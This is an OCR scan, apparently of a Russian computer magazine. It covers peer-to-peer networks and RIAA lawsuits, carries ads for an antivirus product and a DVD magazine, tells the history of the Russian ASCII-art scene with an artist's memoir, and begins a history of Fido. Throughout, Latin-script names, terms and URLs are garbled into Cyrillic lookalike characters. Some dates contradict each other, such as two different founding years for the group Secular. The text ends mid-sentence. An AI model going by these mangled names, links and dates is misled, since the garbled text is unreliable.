развития пиринговых сетей. Разработчики 
№р5Іег совершили революцию в распрост- 
ранении информации, а ОпіЛеІІа стала пер- 
вой децентрализованной сетью. 

А СПЕЦИФИКО Р2Р 

В процессе обмена информацией посред- 
ством пиринговых сетей участвуют одновре- 
менно несколько пользователей. Первый пе- 
редает файл второму, и тот сразу может по- 
делиться им с другими. При этом получае- 
мая информация полностью безвозмездна. 

В системе еЭопкеу если пользователь ска- 
чал только половину файла, этой половиной 
он уже может поделиться с другими. Этот 
фактор существенно увеличивает скорость 
закачек, и на нем основывается система р2р- 
рейтингов. Как сообщают сами разработчики 
приложения в РАО, «чем больше вы раздае- 
те, тем больше и быстрее вы качаете. В 
первый момент времени, когда вы только 
начали качать файл, вам нечего раздавать и 
ваш рейтинг чрезвычайно низок. Вы долго 
стоите по очередям за возможностью ска- 
чать кусочек файла, но вот вам удается ска- 
чать первый кусок и вы даете возможность 
скачать этот кусочек другим. Ваш рейтинг 
растет пропорционально объему разданных 
кусков, а пропорционально рейтингу растет 
и ваша скорость скачивания». 

Кроме того, имеется прямая пропорцио- 
нальная зависимость между шириной канала 
для боѵѵпІоасГа и ирІоасГа. По этим причинам 
пользователи еЭопкеу предпочитают не только 
сливать себе, но и делиться информацией с 
другими. Систему рейтинга использует и про- 
токол ВіІТоггепІ, который считывает количество 
подключений и раздач с треккер-серверов и в 
зависимости от этой статистики оптимизирует 
канал между двумя компьютерами. 




Получается две тенденции: с одной сторо- 
ны стремление к децентрализации, а с дру- 
гой - вынужденная необходимость расшари- 
вать информацию и делиться ею с другими. 
Обе эти тенденции не очень-то сочетаются, 
но сети продолжают успешно работать. 

А ПЕЦЕНТРППИЗаЦИЯ. 
ПИРИНГОВЫХ СЕТЕЙ 

На сегодняшний день самые популярные 
р2р-приложения: ОѵегИеІ, еЭопкеу и 
ВіІТоггепІ. Каждая система отличается от ос- 
тальных. еОопкеу нельзя назвать децентра- 
лизованной системой в полном смысле - 
в ней есть некоторое количество обновляе- 
мых серверов, через которые осуществляет- 
ся вся работа. Огромное количество пользо- 
вателей еОопкеу не имеет никаких затруд- 
нений в поиске нужной информации, а на- 
личие стабильных серверов делает участни- 
ков сети довольно консервативными в своих 
пристрастиях. Несмотря на это, разработчик 
еОопкеу - компания МеІаМасНіпе внедрила 
новое р2р-приложение. Оѵег№{ - это по- 
пытка создать абсолютно децентрализован- 
ную сеть, при этом избежав недостатков 
бпіЛеІІа. В ней не нужно искать информа- 
цию по всей сети, стучась в каждую дверь и 
проходя в первую очередь самые популяр- 
ные запросы. Продуманная система иден- 
тификации и индексации пользователей 
позволяет быстрее и эффективнее найти 
нужную информацию в непосредственной 
близости, что увеличивает скорость коннек- 
та и закачки. Как говорят сами разработчи- 




ки, рано или поздно еЭопкеу рухнет, буду- 
щее пиринговых сетей за децентрализован- 
ными системами. Однако пока еЭопкеу ра- 
ботает, популярность Оѵег№{, вероятно, бу- 
дет ей уступать. 

ВіІТоггепІ создана всего одним человеком 
- программистом Брэмом Коэном. С самого 
начала в эту сеть было заложено несколько 
отличительных черт: нацеленность на расп- 
ространение крупных файлов и не совсем 
децентрализованная структура сети. Первое 
для юзеров неактуально, так как связано с 
экономическими выгодами сети. Именно че- 
рез ВіІТоптепІ, к примеру, компании 
Мапбгаке и Пеб НаХ распространяли свои 
операционные системы. На втором пункте 
стоит остановиться поподробнее. Коэн при- 
думал новый механизм работы сети с при- 
менением треккер-серверов. Эти серваки 
занимаются отслеживанием количества заг- 
рузок файла в сети, и именно через них про- 
исходит обмен информацией. 

Работа на одной из машин сервера обяза- 
тельна, иначе соединение прерывается со- 
общением «Тгаскег із боѵѵп». При таком под- 
ходе можно проследить статистику закачек и 
сформировать рейтинг как сегментов файла, 
так и самих пользователей. Так, согласно 
статистике треккер-серверов на январь 2004 
года эта сеть включала 1 006467 пользовате- 
лей, что не так уж мало. И популярность 
протокола ВіІТоггепІ продолжает расти. 




л Шр://шга/.соп- 
зіііиііоп.огд/іапс/і 
тргоѵ-1803.Мт - 
ЗозерИ І-апсазІег, 
Ітргоѵетепіз іп 
Есіисаііоп 
л Шр://т$к. 
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іті - будущее пи- 
ринговых сетей 
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пеѵѵзІеИег/Ьоу- 
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- противники зву- 
козаписывающих 
компаний 
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В ВАШУ ПОЛЬЗУ! 

Антивирус 

Касперского ® 1 * л 

РѲІГ$ОПс11 5і0 



1. Самая быстрая реакция на новые вирусы 

2. Простой и удобный интерфейс 

3. Высокий уровень обнаружения вирусов 

4. Круглосуточная техническая поддержка 

5. Обновление антивирусной базы каждый час 
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ОКТЯБРЬСКИЙ НОМЕР 
ЖУРНАЛА ТоіаІ ОѴО 
УЖЕ В ПРОДАЖЕ 




В октябрьском номере 
журнала вы найдете: 

+16 рецензий на новинки российского 
кинопроката 

+90 обзоров ОѴО-дисков 5 региона 

+Сравнительные тесты 7 АѴ-ресиверов 
и усилителей 



ТоіаІ ОѴО - каждый номер 
с фильмом на ОѴО 




"ДОГМА" Пожапуй, самый 
сбалансированный срипьм 
Кевина Смита - в нем есть и смех, 
и слезы, и любовь, причем 
любовь религиозного, высшего 
порядка. Замечательное кино, 
которое можно воспринимать и 
как "безбашенную" комедию, и 
как притчу о заблудших душах. 

Борис Хохлов , ТоіаІ 01/0 

(дате)Іа ти/ 





А РЕПРЕССИВНЫЕ МЕРЫ 
И БОРЬБО 30 НЕЗПВИСИНОСТЬ 

Один из основных плюсов децентрализован- 
ных сетей - это невозможность выключить из 
розетки сервер и тем самым отключить всех 
пользователей сети. Поэтому противники пи- 
ринговых сетей следуют по другому пути - 
законодательному. Если за использование 
р2р-приложений будут наказывать тюрем- 
ным заключением (а такие законопроекты 
периодически предлагают в разных странах), 
то, разумеется, количество пользователей 
систем резко сократится. 

Американская ассоциация звукозаписыва- 
ющих компаний неоднократно подавала иски 
в суд, но не на разработчиков р2р, а на их 
активных пользователей. Так, в начале этого 
года ПіАА привлекла к суду 532-х пользовате- 
лей, обвиняемых в распространении неле- 
гальной музыкальной продукции. Помимо 
правовых, звукозаписывающие компании ис- 
пользуют и другие, не совсем честные мето- 
ды. В частности, ПІАА создает испорченные 
файлы под ходовым названием, запускает их 
в пиринговые сети, например в КА2АА, и тем 
самым засоряет информационное простран- 
ство р2р. В результате этого юзеры теряют 
уверенность, что могут скачать нормальный 
файл. Владелец КА2АА - компания ЗІіагтап 
Меіѵѵогкз обещала подать в суд на звукоза- 
писывающие компании, обвинив их во втор- 
жении в частную жизнь своих пользователей 



и намеренном распространении фейка и 
спама (угрозы судебного преследования). 

Не отстают в своей борьбе за независи- 
мость и сами пользователи. Они неоднократ- 
но призывали бойкотировать продукцию 
ВІАА, покупать музыкальные файлы непосре- 
дственно у исполнителей, а если скачивать 
музыку с музыкальных порталов, то отдавать 
предпочтение независимым, таким как сіпи- 
зіс.сот, сбЬаЬу.сот, ссізігееі.сот и др. Кроме того, 
юзеры распространяют футболки и коврики 
для мыши с символикой, направленной про- 
тив РІАА. Очевидно, в этой своей деятельнос- 
ти пользователи пиринговых сетей не менее 
успешны, чем звукозаписывающие компании 
в судебных разбирательствах. 

А ПРОГРЕССИВНОСТЬ Р2Р 

Как система взаимного обучения, так и пи- 
ринговые сети зародились на полном без- 
рыбье: существовал спрос на информацию, 
а доступных источников ее получить не доста- 
вало. Но если Ланкастерскую систему посте- 
пенно вытеснили другие, более продуктивные 
методы педагогики, пиринговые сети на се- 
годняшний день вытеснить уже невозможно. 
Они остаются практически единственным не- 
контролируемым источником бесплатной ин- 
формации. История с электронными библио- 
теками только способствует распространению 
систем реег-іо-реег. Судя по всему, в буду- 
щем они будут продолжать расти и разви- 
ваться, превращаясь не только в абсолютно 
децентрализованные неподко- 
нтрольные системы, но и оп- 
тимальные источники получе- 
ния разных видов информа- 
ции. Уже сейчас среди евро- 
пейских пользователей расп- 
ространяется пиринговое ра- 
дио Мегсога, посредством ко- 
торого передаются не файлы, 
а потоковое аудио. О том, ка- 
кими будут р2р-системы но- 
вого поколения, остается 
только гадать. ЗС 
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авным-давно, когда нв было ещв графического режима, а существовал только текстовый, неизвестный истории человек решил 
изобразить нечто при помощи текстовых символов. Это был первый шаг в цифровом искусстве... 



картинки из букв 




В ереде современных компью- 
терных художников есть два 
важных термина: Мгег 
и Іоѵѵгег. Первое - это сокра- 
щение от «МідМ гезоІіЛіоп» 
(высокое разрешение), Іоѵѵгег, 
соответственно, обозначает 
низкое разрешение. Хайрез - 
это пиксельные рисунки, нарисованные в 
РІіоІоЗІіор'е или Раіпіег'е, а лоурез - все то, 
что принято называть псевдографикой. Ког- 
да рисунки выполняются за счет умелого 
подбора символов, и в общем хаосе на экра- 
не можно увидеть четкие линии и формы. 
Аски-сцена, о которой далее пойдет речь, - 
это составляющая Іоѵѵгег-сцены. Помимо 
АСКИ, ты узнаешь также о таких направлени- 
ях Іоѵѵгег-сцены, как апзі, гір и хЬіп. 



.ІП8СІІИПП8І 

АЗСІІ-арт - своеобразное архаичное искус- 
ство постоянно развивающегося компью- 
терного мира, эдакая наскальная живопись 
дигитал-арта. Инструментами аски-худож- 
ников являются символы АЗОМ -таблицы и 
формат АМЗІ, позволяющий раскрашивать 
эти символы. Дословно эти аббревиатуры 
расшифровываются так: 





азсіншт: наскальная живопись цифрового искусство 



А5СІІ - Атегісап ЗіапсІагсІ Сосіе Тог 
ІпТогта1:іоп Іпіегсбапде. 255 моноширных 
символов размером 8x1 6 пикселов. Сюда 
входят все буквы, цифры и знаки на твоей 
клавиатуре. 

АМ8І - Атегісап ІМайопаІ Зіапсіагсіз 
ІпзШе. Набор езсаре-последовательностей, 
позволяющих задавать 8 цветов фона и 1 6 
цветов самого символа, а также делать эф- 
фект мигания и движения символов. 

В АЗСІІ-арте существует несколько стилей 
рисования: Віоск-зіуіе, ІМеѵѵ-зсІіооІ и ОІб- 
зсИооІ. В первом случае используется набор 
целиком заполненных символов, в результа- 
те чего получаются такие картины, как изоб- 
раженный рядом синий демон. Во втором 
случае юзают примерно четверть символов 
из азсіі -таблицы, что позволяет создавать 
плавные переходы и линии. В третьем все, 
на что может рассчитывать художник, - 
палочки, черточки, скобочки и кавычки. 

Существуют также и другие, менее расп- 
ространенные стили, к которым относятся 
ВІРЗСВІРТиХ-ВІМ. 

КІР8СВІРТ - формат векторной графики. 
Используется редко, но с его помощью не- 
которые художники умудрялись создавать на 
редкость реалистичные изображения, порой 
даже сравнимые с хайрезом. 

Х-ЕШ - формат, предложенный группой 
АсісІ. Основан на замене неиспользуемых в 
работе символов другими, которые художник 
собственноручно рисует в редакторе шриф- 
тов. Это позволяет добиваться более плав- 
ных линий и переходов. 

^ кок все начиналось 

Зародился аски-арт примерно в середине 
80-х годов. В то время варезные группы на 
Соттосіоге 64 придумали новую модную 
фишку - добавлять к своим релизам красиво 
оформленные инфошники. В них находился 
хидер в виде аски-логотипа с названием ко- 
манды. Такие инфошники вставлялись прак- 
тически в каждый релиз, будь то варез или 
крак. Так что ни о каком отдельном сообще- 
стве речи не шло - оісі-зсМооі азсіі (или 
атіда зТуІе, как его раньше называли) был 
всего лишь частичкой варез-сцены. 

Постепенно, к концу 80-х, амига-стайл пе- 
рекочевал на РС. Это были все те же палочки 
и черточки, но смотрелась картинка по-друго- 
му. Ведь шрифты на Амиге и ПК были разные. 

В начале 90-х гг. Амига начала сдавать 
свои позиции. Аски-сцена так и не успела 
развернуться на этой платформе, ей было 
суждено появиться на РС. И произошло это 
в 1991 г., когда небезызвестная группа АсісІ 
с южного побережья США зарелизила свой 
арт-пак. Он стал первым кирпичиком в фун- 
даменте всей арт-сцены. Правда, в этом 
арт-паке не было ни одной аски - они появи- 
лись лишь в середине 90-х, когда художники 
из АсісІ сформировали отдельный сііѵізіоп 
под названием Ветогзе. 

^ ИСКИ-ГРУППЫ В СНГ 

Первые аски-работы из СНГ стали появляться 
в 95-ом году. Они носили скорее эксперимен- 
тальный характер. Двумя годами позднее, 14 
ноября 1997 г., появилась первая русская ас- 
ки-группа Эиз1:-Х, состоящая из двух мембе- 
ров: СгазГіег и Сагтюг. Позже к ней присоеди- 
нились Зкеісб Вітапег, Хгір, ЗГіасІоѵѵ, Хкеу. В 



дальнейшем неоднократно менялся как сос- 
тав, так и контент арт-паков. Сейчас Зизі-Х 
практически полностью перешел на хайрез. 

1 999 год стал датой рождения аски-дивижна 
СГіаоз Епегду Огоир и легендарной Оаіга. В 
принципе, оба тима представляли собой аски- 
подразделения крупных Ыгег-команд. Название 
Оаіга родилось случайно. Ігоп Шпд, создатель 
группы, просто перепугал буквы в слове СІаіа, 
когда изобретал название на канале ІВС. Неко- 
торое время спустя СЕС стал сдавать позиции, 
и большинство аски-художников ушло оттуда, 
основав группу Зесиіаг. Ее лидером стал ЗІазГі. 

Саіга и Зесиіаг стали основными аски-ко- 
мандами на долгое время. Здоровая конку- 
ренция со временем перешла в противостоя- 
ние и чуть ли не во вражду. Открытая непри- 
язнь друг к другу лидеров обеих групп накла- 
дывала отпечаток на отношения остальных 
художников, и это делало соперничество еще 
более ожесточенным. Однако после того как 
координатором Галзы стал Монгол, а лидер 
Секуляра Слэш уехал в Америку, оставив 
группу на попечение Скетча (ЗВВ) и Паши 
(РЗН), конфликт себя исчерпал. 

В период с 2000 по 2003 год на русскоя- 
зычной аски-сцене присутствовали такие 
группы, как ЗупШейс Мазз Веасйоп (5МВ), 
Ргоіесі 13 и Ъе ІМ. ЗМВ в основном являла 
собой классику аски-арта - логотипы и зас- 
тавки на ВВЗ. Ргоіесі 13 основал ЗГіасІоѵѵ - 
довольно мрачная личность, под руковод- 
ством которой было выпущено 4 пака, после 
чего группа умерла. 1е\\по\ была создана 
2еготап'ом и успела выпустить 5 арт-паков - 
затем 2еготап решил ее оставить и заняться 
сольным проектом Оіѵізіоп Ьу Іею. 

А ЛЕГЕНДЫ ИСКИ-СЦЕНЫ 

Так как русская АЗСІІ -сцена - довольно тес- 
ное комьюнити, активных людей в ней мож- 
но пересчитать чуть ли не по пальцам. 

Я расскажу о самых ярких художниках, кото- 
рый внесли в аски-арт несомненный вклад. 

СгазИег - питерский художник, основа- 
тель Зизі-Х. 
После по- 
беды на пи- 
терской де- 
мопати ра- 
ботал в 
Саііа. В на- 
чале карье- 
ры рисовал 
изящные шрифты а-Іа бідііаі дгаШі, впос- 
ледствии перешел на абстракционизм. Его 
стиль - странно раскрашенные псевдо- 
трехмерные композиции, цветовые пятна 
на рандомных наборах символов или кус- 
ках файла, по-детски кривые наброски че- 
ловечков, схематичные банановые шкурки 
и т.п. Кроме этого, есть еще «Бузина» - 
местами смешные, местами глупые паки 
пародий на других художников. Сомни- 
тельной художественной ценности и уж 
точно мало о чем говорящие людям, не 
следившим за российской арт-сценой в 
2002-2003 гг. На данный момент главный 
редактор арт-зина «Цифра». 

Денис «0і2г» Сущенко ака РепеІгаШг - 
талантливый зеленоградский художник, кото- 
рый, к сожалению, не был отмечен особым 
вниманием публики. Его сценовая карьера 
началась в начале 1 998-го года со вступле- 



ния в группу 
ІІ2НІ (Ііпііесі 
2еІеподгасІ 
Наскегз ;). 
Потом 0\7і 
помогал ИВС 
сгеѵѵ делать 
ЕѵіІ Оізктад, 
а в 1 999 г. 

стал одним из основателей Зесиіаг, в кото- 
ром публиковал свои релизы вплоть до 14- 
го номера. 

Сергей «Ігоп_І.ипд» Сафонов - моск- 
вич. Начал рисовать где-то в 1996 г. для 
НеІІгаізег Сгоир (НРС) под ником ЭАРК. 

Очень быстро вырос в отличного художника, 
который в то 
время был 
богом рус- 
ской аски- 
сцены. С по- 
явлением 
Оаіга стал в 
ней лиде- 
ром, но к 7- 
му паку его присутствие там свелось к мини- 
муму, и в последующих паках он релизится 
редко. Техника Ігоп Шпд'а очень четкая и 
очень индивидуальная. Целые поколения ху- 
дожников признавали его своим кумиром и 
учились исключительно на его работах - 
мрачных, диких, подчас садистских вылазках 
к темной стороне человеческой жизни. Нем- 
ногие осознавали, что за этими работами 
стоит мощная индивидуальность, потому 
достичь уровня Ланга из тех, кто к этому 
стремился, не смог никто. 

ЗМасІоѵѵ - выходец из ги.рісІигез.рзеѵсІо.дгаТ 
(гррд), фидошной эхоконференции, посвя- 
щенной мейнстриму аски-арта. Сюда отно- 
сятся заставки для ВВЗ и всяческие реквесты 
(заказные рисунки - прим. тіпсІѵѵОгк). Очень 
мрачная личность, создал группу Ргоіесі 13, 
где явил аски -сообществу такие же мрачные 
картины. В своих творениях, в основном, ис- 
пользовал оттенки серого и красный цвет, 
естественно, изображающий кровь. С перво- 
го пака отметилась странная любовь к порт- 
ретам нацистских личностей, за что был по- 
рицаем многими художниками. Со временем 
ушел в Саіга, где рисовал до тех пор, пока 
трагический поворот судьбы не оборвал 
жизнь этого самобытного и своеобразного 
аски-художника. 

Сергей «ЗІазН» Киреев - уфимский ху- 
дожник, рисовать начал во второй половине 
1998 г. Пер- 
вые работы 
были опубли- 
кованы в 
электронном 
журнале 
Візіпд #2, где 
ЗІазМ был 
главным ре- 
дактором и сосіег'ом. Там же появилось нес- 
колько его статей про азсіі и знаменитый «Урок 
рисования в АСКИ», которому мы обязаны по- 
явлением на сцене многих талантливых худож- 
ников. Второй «Урок» вышел гораздо позже - в 
апреле 2000 г., в издании ЕѵіІ #4. 

После непродолжительной работы в соста- 
ве СМаоз Епегду Огоир, в октябре 1994 г. ста- 
новится одним из основателей Зесиіаг - вто- 








л ѵѵш/.зсепе.ги - 
русскоязычный 
АЗСІІ -ресурс 
^ ѵтѵѵ.іііидіііе.огд 
- крупнейший 
портал аски-сцены 
и не только 
л Шр://ІеесЬ.5сепе. 
ги/зесиіаг/зсіг- 
Нг.гаг - уроки 
рисования в аски 
лтт. даііа.ік - 
официальный сайт 
легендарной Галзы 
л Шр://ізіІга. 
зрЬ.ш - сайт арт- 
сценового журнала 
«Цифра» 

л Шр://сіиі5.ги/ 
азс-шз - сайт 
знаковых аски- 
художников и групп 
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рой конкурентоспособной русской азсіі-груп- 
пы наряду с Саіга. Там же релизит свои мно- 
гочисленные работы. После трагического для 
сцены отъезда в США почти не рисует. Хотя в 
последних Секулярах есть пара его работ. 
Запомнился ЗІазМ своими «лицами» - портре- 
тами разных людей в разного рода ракурсах 
с очень подходящими подписями к ним. 

ЗІазМ, безусловно, великолепный портретист, 
и теперь уже мало кто помнит, что раньше он 
еще рисовал разные Іодо, в которых подчас 
мелькали очень интересные идеи. 

Алекс «Ѵііаг» Ящук - украинский худож- 
ник из Киева. По большей части, Ѵііаг рисует 
всевозмож- 
ные тэги (он 
и в миру ба- 
луется граф- 
фити), но 
зачастую 
они являют 
собой нечто 
большее, 
чем просто 
логотип. У 

Ѵііаг'а очень интересная техника, отшлифо- 
ванная годами рисования. Рваные и небреж- 
ные штрихи, великолепно передающие дина- 
мику, - скупые мазки виртуальной кисти по 
виртуальному полотну. Стиль узнается сразу, 
без подписи. Высший класс мастерства. В 
своих работах Ѵііе циничен и язвителен. Чего 
стоит только мальчик, писающий на надпись 
«Аски 2001 », или плюшевый мишка, олицет- 
ворение детства... со шприцем в вене. В об- 
щем, хороший художник, хоть и понятный 
лишь искушенному зрителю. 

Сергей «Хаос» Доничев - иркутский ху- 
дожник. Таинственная личность, в паках 
Зесиіаг'а зарелизил несколько по-настояще- 
му прекрасных вещей. Прочие детали сцени- 
ческой карьеры неизвестны :(. Одно время 
глупые люди требовали у Хаос'а доказа- 
тельств того, что он действительно рисует 
свои вещи. В ответ художник прислал видео- 
кассету с 
записью 
процесса. У 
Хаос'а очень 
эмоциональ- 
ный подход 
и четко 
обозначен- 
ная техника, 





высочайшее качество работ, 
отчасти достигающееся посредством ис- 
пользования «решетки». Великолепно пере- 
дает объем, как в портретах, так и в сценах. 

Артемий «Хкеу» Новиков - художник из 
Новосибирска, на сцену попал благодаря 
НеасІсгазМег-у (ех-ЭЮ). Слэш нашел его в 
ги.іехітосіе.аіі и притащил в 16-й Секуляр. 
Поначалу Хкеу рисовал очень приятные и тех- 
ничные ми- 
ниатюрки, 
выполнял 
много рек- 
вестов, сде- 
лал кучу ин- 
фошников 
для разных 
групп, зас- 
тавки для ВВЗ. В поздних паках встречается 
пара обалденных портретов. Работы Икскея 
полны своеобразного юмора и вызывают 
улыбку, а иногда обжигают, словно удар плет- 
кой. Как, например, «Раіп» из 19-го Секуляра. 
Техника Хкеу'я, можно сказать, ювелирна. У 
него хорошее чувство формы и оправданная 
любовь к стилизации изображения. 

Роман «2еготап» Шуталев - тоже вы- 
ходец из фидошной гррд. Сначала думал 

пойти в Се- 
куляр, но 
вместо этого 
основал 
2е ііпоі, пос- 
ледние паки 
которого 
могли конку- 
рировать с 

Саіга и Зесиіаг, впавшими к тому времени в 
коматозное состояние. Очень быстро раз- 
вился в хорошего художника с прекрасным 
чувством стиля. Зарелизил также несколько 
запоминающихся хайрезов. 

Андрей «2тф Серов - олд-скульщик и 
амижник. Как в аски, так и в хайрезе выделил- 
ся довольно 
интересными 
эксперимента- 
ми в стиле 
конструктивно- 
го минимализ- 
ма. Идейно 
подкован, как 
сказали бы в СССР, в вопросах кибер-расы, 
поэтому работы Змея очень авангардны. Ува- 
жает классиков абстракционизма В. Кандинс- 
кого и К. Малевича. 

Л ГППЕРЕЯ СРЕДИ РЖПВЫХ ТРУБ 

Как правило, на демосценерских пати аски- 
арту отводится довольно скромное место. 
Некоторые вообще забывают про эту номи- 
нацию. Скорее всего, это связано со слабой 
активностью самих аскишников. 

Поэтому, не дожидаясь приглашения, 
группа Саіга решила провести свое собствен- 
ное шоу. Так 16 марта 2001 г. в Ижевске сос- 
тоялась первая специализированная аски- 
выставка СуЬег Оесасіепсе. Проходила она в 
мрачном подвальном помещении жилого до- 
ма. Чтобы добраться к месту действия, нужно 
было миновать лабиринты ржавых труб, ныр- 
нув за черную занавеску. Галерея представ- 
ляла собой вывешенные на стенах распечатки 
аскишных работ известных художников из 
Ижевска, Москвы, Санкт-Петербурга, Дании, 






Бельгии и Финляндии. Все они светились в 
ультрафиолете, а специфическая музыка 
лишь подчеркивала атмосферу. 

У «Кибер-Упадка» было три пришествия: 
в Ижевске, Москве и Калининграде. Но первое 
однозначно оказалось самым андеграундовым. 

^воспоминания старого 
пскишника 

По просьбе тіпсІѵѵОгк'а попробую рассказать о 
своей карьере аски-художника и жизни в тес- 
ном сообществе, известном как АЗСІІ зсепе. 

Рисовать аски я начал в мае 2000 года. До 
этого были какие-то несерьезные попытки и 
пробы, но ничего путного из этого не вышло. 
Толчком к развитию для меня стала работа 
ЗІазГі’а из 3-го Зесиіаг’а «Огеатіпд АЬоиІ 
ТЫ ІМідМ». Это был очень выразительный 
портрет девушки. Я решил, что буду рисо- 
вать так же или еще лучше. 

Прошлое художника-самоучки сыграло 
мне на руку. Я быстро уловил суть и бук- 
вально через 2-3 месяца начал рисовать до- 
вольно неплохие портреты. Один из них я 
запостил в фидошную эхоконференцию 
Ви.ТехІтосІе.АіІ. Там меня сразу заметил не 
кто иной, как ЗІазІі и пригласил в Зесиіаг. Я 
тут же согласился. 

В 13-м паке состоялся мой дебют. Я 
представил на зрительский суд десяток ра- 
бот, которые нарисовал в какой-то аскишной 
лихорадке всего за месяц. Мнения народа 
разделились. Кто-то восторгался, кто-то на- 
мекал, что, дескать, все пикчи сконверчены, 
а Слэш назвал меня «ту ѵегу Таѵогі1:е азсіі- 
аііізі оп зсепе». 

После этого триумфа я, голодный до ин- 
формации, стал выспрашивать у Слэша под- 
робности аскишной жизни. В то время я кон- 
тактировал по фидо только с Крэшером и 
Слэшем. Хотелось пообщаться с другими ху- 
дожниками, но иного способа, кроме как на- 
писать каждому лично, просто не было. 

Последующая моя аски -деятельность ог- 
раничивалась лишь фидошкой. Я знал, что 
наши арт-паки выкладывают в инет, что их 
смотрят за бугром, но мнения далеких бур- 
жуев меня особо не интересовали. Гораздо 
важнее было то, что скажут несколько конк- 
ретных людей из фидо. 

В это же время нарастал конфликт Галзы 
и Секуляра. Вражда лидеров заставляла 
мемберов из каждой группы подписываться 
за свою команду. В эхах лились потоки руга- 
ни и взаимных оскорблений, доходящих 
иногда до угроз физической расправы. Крэ- 
шер делал акцент на то, что в группу Зизі-Х 
входят представители враждующих команд 
(СгазГіег//0аІ2а и ЗкеісГі Рітапег//ЗесиІаг) , 
пытаясь, наверное, как-то примирить горячих 
аскишных парней, но это особо не помогало. 

Потом из группы Секуляр, с треском хлоп- 
нув дверями, ушел 2теі. Ушел в Галзу, напи- 
сав напоследок презрительное письмо. Змей 
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по духу был ближе к киберпомешанной Гал- 
зе, поэтому его уход меня не удивил. А скан- 
дальное прощание очень походило на эпа- 
таж, которым славились все мемберы Галзы. 

Вообще, вся сценерская жизнь - это чере- 
да взаимных наездов и скандалов. Этакая 
игра в «Царя горы». Периодически в эхе по- 
являлся новый человек, который начинал 
гнать стадо белых лошадей на группу или на 
художника. Моментально вспыхивали особо 
ранимые аскишники, и ближайший месяц 
вся эха дружно ругалась. Затем страсти 
слегка утихали... до выхода нового арт-пака. 

Однажды Слэш сказал мне, что уезжает в 
США, возможно, на ПМЖ. Группу оставил на 
попечение Паши и меня. Выдал мне адреса 
всех мемберов и укатил в Америку. Паша ку- 
рировал дела Секуляра в инете, а я, в основ- 
ном, в фидо. Придерживаясь периодической 
политики Секуляра, мы релизили паки по за- 
вету Слэша 19-го числа каждого месяца. Но 
как оказалось в дальнейшем, художники вов- 
се не забрасывали лидера кучей рисунков, 
из которых тот отбирал самые лучшие. Все 
было куда прозаичней. Я постоянно писал 
мемберам письма с просьбами поторопить- 
ся и прислать хоть по одному рисунку для 
пака! Поначалу это помогало. 

Потом я решил сделать паки тематичес- 
кими - чтобы рисунки были на определен- 
ную тематику и чтобы арт-пак шел не 
просто по номеру, а имел название. Охва- 
ченный этой идеей, я высказал ее мембе- 
рам. Но, как оказалось, народ у нас пред- 
почитает ходить по утоптанной тропе. 
Мемберы отказывались рисовать на задан- 
ную тему, поддержал меня только Хкеу, с 
которым у меня были великолепные отно- 
шения, и еще пара мемберов. 




Поняв, что толку от всех этих прений не 
будет, я начал тащить арт-паки на своих 
плечах и плечах тех, кто меня поддержал. 
Больше всего проблем было с первыми дву- 
мя тематическими паками, потом постепен- 
но народ привык. Зрителям понравилось 
погружение в определенную атмосферу, а не 
просто просмотр логотипов и заставок ВВЗ. 
Наверное, это можно назвать очередной сту- 
пенькой вверх, к искусству от производства 
логотипов. Окрыленный этими мыслями, я 
сообщил всем, что логотипы и лозунги при- 
ниматься больше не будут. Конечно, извес- 
тие наделало много шума, ведь многие аски- 
художники ничего, кроме логотипов или над- 
писей «Гальза - это круто!», не рисуют. И 
когда у меня скопилась достаточно большая 
кипа логотипов, я выпустил их отдельным 
паком «Черно-белое кино и лозунги». Это 
был 24-й по счету Зесиіаг. 

Следующий пак стал апофеозом моего 
лидерства в группе. Туда вошла моя совме- 
стная с Хкеу'ем работа «Зійіпд Оп Тор оТ ба 




ѴѴогІб», которая сильно всколыхнула умы ас- 
кишного сообщества. Картина была обсоса- 
на со всех сторон, а Крэшер даже сделал на 
нее хороший римейк. 

Шло время. Теперь мне приходилось па- 
раллельно работать и учиться. Это не остав- 
ляло времени для рисования, ведь обычно 
на аски-рисунки уходит очень много сил. Се- 
куляр релизился все реже, что вызывало у 
народа сожаление. К тому времени я уже 
ушел из фидо и отстранился от аски-сцены. 
Краем уха слышал, что буржуи тащатся от 
Секуляра, а некоторые мои работы получили 
в каких-то журналах высокие оценки. Но это 
меня мало интересовало, как и зарубежная 
аски -сцена вообще. Я всегда оставался фи- 
дошным художником. 

Параллельно с этим я втихаря рисовал 
свой сольный проект Зебосгебе. Рисовал его 
ровно год, дабы им ознаменовать свой уход 
с аски-сцены. Морально я уже пришел к вы- 
воду, что достиг всего, чего хотел. Мой 
сольник оправдал все надежды - он был кон- 
цептуальным и наполненным. Люди чувство- 
вали это и реагировали соответственно. В 
общем, это стало пиковым моментом в моей 
аски-карьере. И вскоре после релиза 
Зебогебе я решил поставить точку, передав 
бразды правления группой Хкеу'ю. 30-й пак 
он выпустил уже как лидер Секуляра. 

Правда, сказать: «Я ухожу со сцены!» - 
оказалось проще, чем действительно уйти 
с нее. Руки помнили свое дело, и помимо 
воли я иногда открывал Асіб Эгаѵѵ и рисо- 
вал. Эти рисунки релизились в последую- 
щих Секулярах. Но затем мое внимание пе- 
реключилось на другую деятельность. Ра- 
бота и музыка практически увели меня в 
сторону от аски-арта. А где-то в фидо ас- 
ки-террористы Сгазбег и ОхеІ проводили 
акцию под секретным названием «Вернуть 
Скетча», всячески пытаясь задеть его само- 
любие своими пародийными пикчами и 
заставить рисовать в ответ... ЗС 




Выражаю 
свою призна- 
тельность: 

Ѵііаг, Е-І.епа, 
^зііііп, 

МопдоІ. 

А 
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В 1 997 году меня перевели в 
«геасі опіу» как минимум в 
десяти эхах, мой босс от меня 
отказался, сказав на про- 
щанье: «С меня хватит!», 
в регионе 2:468 меня прозвали 
«Легенда херсонского флей- 
ма», а любимыми моими мес- 
тами были ЗітЕП) и ТУГ. ВСЕ. НАСРЕМ. 
Старые добрые времена, старое доброе 
Фидо... Иногда я даже сейчас вспоминаю 
о веселых перепалках и своих похождениях 
в этой бывшей мне такой родной сети. 
Думаю, каждый, кто застал ТЕ времена Фи- 
до, меня поймет. А для остальных я пригото- 
вил небольшой обзор тусовки Фидо, не вда- 
ваясь в технические подробности. 



А ТОМ ДЖЕННИНГС 

В 1 984 г. в двух разных уголках Америки жи- 
ли двое компьютерщиков: Том Дженнингс из 
Сан-Франциско и Джон Мэдилл из Балтимо- 
ра. Парни постоянно тусили на разных ВВЗ и 
обменивались друг с другом свежим варе- 
зом. Правда, к постоянно занятым бордам 
приходилось дозваниваться ручками, поэто- 
му порой чтобы ответить на приватные пись- 
ма, нужно было потратить уйму времени. Ле- 
нивые Том и Джон от этого очень уставали, 



